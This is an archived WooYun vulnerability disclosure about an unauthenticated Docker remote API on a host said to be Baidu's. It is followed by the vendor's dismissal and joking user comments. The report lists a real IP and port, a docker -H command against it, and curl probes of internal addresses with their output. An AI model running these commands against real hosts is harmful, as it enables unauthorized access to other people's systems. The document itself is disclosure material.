新姿势之获取百度机器root权限

admin

139598
文章

114
评论

2017年4月29日11:37:23评论344 views字数 212阅读0分42秒阅读模式

摘要

2016-05-17：细节已通知厂商并且等待厂商处理中
2016-05-17：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-17：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(103) 关注此漏洞

缺陷编号： WooYun-2016-209509

漏洞标题：新姿势之获取百度机器root权限

漏洞作者：黑客,绝对是黑客

提交时间： 2016-05-17 03:05

公开时间： 2016-05-17 11:41

漏洞类型：

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：敏感信息泄露

33人收藏

漏洞详情

披露状态：

简要描述：

请允许我再刷一个～
什么时候有first blood效果
预告！drops分析文章即将发布

详细说明：

docker remote api未授权访问

code 区域

http://180.76.161.55:2375

查看运行的容器

code 区域

docker -H tcp://180.76.161.55:2375 ps
 CONTAINER ID        IMAGE                                                                COMMAND                  CREATED             STATUS              PORTS                    NAMES
 d294b4eed64f        registry.bae.bj.baidubce.com/public/ubuntu12.04_web_php5.5:6653-91   "/usr/bin/tini -- /us"   7 weeks ago         Up 7 weeks          0.0.0.0:8888->8080/tcp   grave_williams
 e6ba8c1ca7e8        swarm                                                                "/swarm join --advert"   7 weeks ago         Up 7 weeks          2375/tcp                 sick_lichterman

域名证明为百度

code 区域

registry.bae.bj.baidubce.com

拿root权限，过程请参考之后发布的drops文章

ifconfig

code 区域

:~# ifconfig
 docker0   Link encap:Ethernet  HWaddr 02:42:df:68:95:78
           inet addr:172.17.0.1  Bcast:0.0.0.0  Mask:255.255.0.0
           inet6 addr: fe80::42:dfff:fe68:9578/64 Scope:Link
           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
           RX packets:933462 errors:0 dropped:0 overruns:0 frame:0
           TX packets:889024 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0
           RX bytes:77456385 (77.4 MB)  TX bytes:119620987 (119.6 MB)
 
 eth0      Link encap:Ethernet  HWaddr fa:16:3e:75:d9:b9
           inet addr:192.168.2.189  Bcast:192.168.255.255  Mask:255.255.0.0
           inet6 addr: fe80::f816:3eff:fe75:d9b9/64 Scope:Link
           UP BROADCAST RUNNING MULTICAST  MTU:1400  Metric:1
           RX packets:13544982 errors:0 dropped:0 overruns:0 frame:0
           TX packets:11278565 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000
           RX bytes:2681279156 (2.6 GB)  TX bytes:2649540661 (2.6 GB)

registry.bae.bj.baidubce.com内网ip 10.16.83.153

code 区域

:~# ping registry.bae.bj.baidubce.com
 PING registry.bae.bj.baidubce.com (10.16.83.153) 56(84) bytes of data.
 64 bytes from 10.16.83.153: icmp_req=1 ttl=61 time=0.300 ms
 64 bytes from 10.16.83.153: icmp_req=2 ttl=61 time=0.314 ms
 64 bytes from 10.16.83.153: icmp_req=3 ttl=61 time=0.274 ms

经过测试发现与

WooYun: 一不小心走进了百度内网

漏洞在同一网段

code 区域

:~# curl 10.16.83.164:8080
      __          _     __
     / /_  ____ _(_)___/ /_  __      _________  _____
    / __ // __ `/ / __  / / / /_____/ ___/ __ // ___/
   / /_/ / /_/ / / /_/ / /_/ /_____/ /  / /_/ / /__
  /_.___//__,_/_//__,_//__,_/     /_/  / .___//___/
                                      /_/
 User Manual : http://wiki.baidu.com/display/RPC
 
 /status : Status of services
 /connections : List all connections
 /flags : List all gflags
   /flags/port : List the gflag
   /flags/guard_page_size;help* : List multiple gflags with glob patterns (Use $ instead of ? to match single character)
   /flags/NAME?setvalue=VALUE : Change a gflag, validator will be called. User is responsible for thread-safety and consistency issues.
 /vars : List all exposed bvars
   /vars/rpc_num_sockets : List the bvar
   /vars/rpc_server*_count;iobuf_blo$k_* : List multiple bvars with glob patterns (Use $ instead of ? to match single character)
 /rpcz : Recent RPC calls(disabled)
   /rpcz/stats : Statistics of rpcz
   /rpcz?time=2016/05/17-00:05:28 : RPC calls before the time
   /rpcz?time=2016/05/17-00:05:28&max_scan=10 : N RPC calls at most before the time
   Other filters: min_latency, min_request_size, min_response_size, log_id, error_code
   /rpcz?trace=N : Recent RPC calls whose trace_id is N
   /rpcz?trace=N&span=M : Recent RPC calls whose trace_id is N and span_id is M
 /hotspots/cpu : Profiling CPU (disabled)
 /hotspots/heap : Profiling heap (disabled)
 /hotspots/growth : Profiling growth of heap (disabled)
 curl -H 'Content-Type: application/json' -d 'JSON' 10.63.28.21:8002/ServiceName/MethodName : Call method by http+json
 /version : Version of this server, set by Server::set_version()
 /health : Test healthy
 /vlog : List all VLOG callsites
 /sockets : Check status of a Socket
 /bthreads : Check status of a bthread
 /ids : Check status of a bthread_id
 /protobufs : List all protobuf services and messages
 /list : json signature of methods
 /threads : Check pstack (disabled)
 /dir : Browse directories and files (disabled)

code 区域

:~# curl 10.16.83.151
 [cf971f2d3a042b53308e9696d4923bdb] Not allowed to access builtin services, try ServerOptions.internal_port=8222 instead if you're inside Baidu's network

已证明，不再深入

漏洞证明：

修复方案：

版权声明：转载请注明来源黑客,绝对是黑客@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-05-17 11:41

厂商回复：

赞这个提交！很cool，但是，但是，经过我们排查，这个漏洞非百度及开放云漏洞。我们开放云的客户在虚机上使用了BAE公共docker镜像搭建了docker服务来测试，并且开启了remote api，却没有认证！客户说，这个只是他的测试帐号，明天将会重装，允许我们提前忽略来配合drops文章的发布，非常期待！

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-05-17 05:25 | Mel0d6y ( 实习白帽子 | Rank:77 漏洞数:15 | 迷失在未来的旅行者. 「H...)

1

黑阔，绝对是黑阔

1# 回复此人
2016-05-17 05:45 | Brother ( 实习白帽子 | Rank:78 漏洞数:24 )

0

小号，绝对是小号

2# 回复此人
2016-05-17 06:12 | prolog ( 普通白帽子 | Rank:944 漏洞数:197 )

0

小号，绝对是小号

3# 回复此人
2016-05-17 06:21 | 7路公交老司机 ( 实习白帽子 | Rank:39 漏洞数:4 | 摇滚救不了中国人)

0

卧槽。。看了眼洞主的漏洞列表，太黑客啦，绝对是黑客

4# 回复此人
2016-05-17 07:23 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

0

审核大大辛苦了,3点还在审核洞

5# 回复此人
2016-05-17 07:46 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

0

大牛，绝对是大牛

6# 回复此人
2016-05-17 08:25 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低，根本轮不到去拼...)

0

来势汹汹。

7# 回复此人
2016-05-17 08:38 | Sunshie ( 普通白帽子 | Rank:113 漏洞数:32 | http://phpinfo.meฏ๎๎๎๎๎๎๎๎๎๎...)

0

id可以..

8# 回复此人
2016-05-17 08:39 | 子非海绵宝宝 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

0

牛逼,绝对牛逼.

9# 回复此人
2016-05-17 08:40 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

0

大牛，绝对是大牛

10# 回复此人
2016-05-17 08:49 | luwikes ( 普通白帽子 | Rank:552 漏洞数:83 | 潜心学习~~~)

0

霸气，绝对霸气

11# 回复此人
2016-05-17 08:57 | 凌晨G度 ( 路人 | Rank:7 漏洞数:2 | 充实的麦穗都是低着头，倒是那些空壳却昂着...)

0

小号，绝对是小号

12# 回复此人
2016-05-17 09:03 | 十万伏特 ( 路人 | Rank:2 漏洞数:1 | Hello 乌云)

0

黑客,绝对是黑客

13# 回复此人
2016-05-17 09:14 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀，伊雅伊尔哟。)

0

这逼装得满分。

14# 回复此人
2016-05-17 09:30 | Orvilla ( 路人 | Rank:4 漏洞数:1 | 菜逼来学习)

0

黑客,绝对是黑客

15# 回复此人
2016-05-17 09:35 | E.M ( 路人 | Rank:4 漏洞数:1 | 过来打我啊。。。。)

1

溜得不要不要的

16# 回复此人
2016-05-17 09:51 | 小川 ( 核心白帽子 | Rank:1627 漏洞数:242 | 一个致力要将乌云变成搞笑论坛的男人)

0

我已经准备好为你点赞哦

17# 回复此人
2016-05-17 10:26 | xiaoyu. ( 路人 | Rank:14 漏洞数:4 | xiaoyu)

0

黑客,绝对是黑客；；；；

18# 回复此人
2016-05-17 10:29 | loli ( 普通白帽子 | Rank:649 漏洞数:59 | 每个男人心中都住着一个叫小红的88号技师。)

0

牛逼

19# 回复此人
2016-05-17 10:33 | 少宇 ( 实习白帽子 | Rank:62 漏洞数:19 | QQ ：1126179674 By : 少宇 http://www.90...)

0

小号，绝对是小号，人家刷洞，你刷雷

20# 回复此人
2016-05-17 11:19 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

0

骚，绝对是骚

21# 回复此人
2016-05-17 11:59 | 我的邻居王婆婆 ( 普通白帽子 | Rank:4034 漏洞数:675 | 拓展新领域)

0

公开了公开了

22# 回复此人
2016-05-17 12:13 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

0

拿root权限，过程请参考之后发布的drops文章

23# 回复此人
2016-05-17 12:23 | Yosef ( 实习白帽子 | Rank:73 漏洞数:21 | 苦逼程序猿一枚)

0

@百度提前公开666，大赞

24# 回复此人
2016-05-17 12:59 | DNS ( 普通白帽子 | Rank:803 漏洞数:85 | )

0

提前公开啊

25# 回复此人
2016-05-17 15:26 | 凌零1 ( 普通白帽子 | Rank:320 漏洞数:57 )

0

为啥主机名叫wjl-test,你搞的谁

26# 回复此人
2016-05-17 15:51 | cfan ( 路人 | Rank:8 漏洞数:2 | mechanism)

0

:~# ls es IOT kubernetes-server-linux-amd64.tar.gz :~#

27# 回复此人
2016-05-17 17:37 | wkmc ( 路人 | Rank:13 漏洞数:2 | 挖不完的洞洞，补不完的丁丁)

0

@Mark0smith http://www.cn-sec.com/drops//papers/15892?utm_source=tuicool&utm_medium=referral

28# 回复此人
2016-05-17 17:51 | CCkerber ( 路人 | Rank:26 漏洞数:13 | 没有安全的系统，没有逻辑的逻辑。)

0

这么着开小号真的好么

29# 回复此人
2016-05-17 22:36 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg？得失乐与悲与Av Qq205655539)

1

厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-17 11:41 厂商回复：赞这个提交！很cool，但是，但是，经过我们排查，这个漏洞非百度及开放云漏洞。我们开放云的客户在虚机上使用了BAE公共docker镜像搭建了docker服务来测试，并且开启了remote api，却没有认证！客户说，这个只是他的测试帐号，明天将会重装，允许我们提前忽略来配合drops文章的发布，非常期待！最新状态： 2016-05-17：至于10.16.83.X，该段设计之初就是暴露给北京region的云上租户虚机，提供的都是公共服务。如果发现公共服务存在漏洞，欢迎通过BSRC或者WooYun报告给我们。漏洞评价：对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

30# 回复此人
2016-05-18 01:28 | justpluto ( 路人 | Rank:15 漏洞数:1 | exploit%00)

0

黑客，绝对是黑客

31# 回复此人

漏洞概要 关注数(103) 关注此漏洞

缺陷编号： WooYun-2016-209509

漏洞标题： 新姿势之获取百度机器root权限

相关厂商： 百度

漏洞作者： 黑客,绝对是黑客

提交时间： 2016-05-17 03:05

公开时间： 2016-05-17 11:41

漏洞类型：

危害等级： 高

自评Rank： 20

漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 敏感信息泄露

33人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑客,绝对是黑客@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(103) 关注此漏洞

漏洞标题：新姿势之获取百度机器root权限

相关厂商：百度

漏洞作者：黑客,绝对是黑客

危害等级：高

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签：敏感信息泄露

版权声明：转载请注明来源黑客,绝对是黑客@乌云

漏洞评价(共0人评价):

登陆后才能进行评分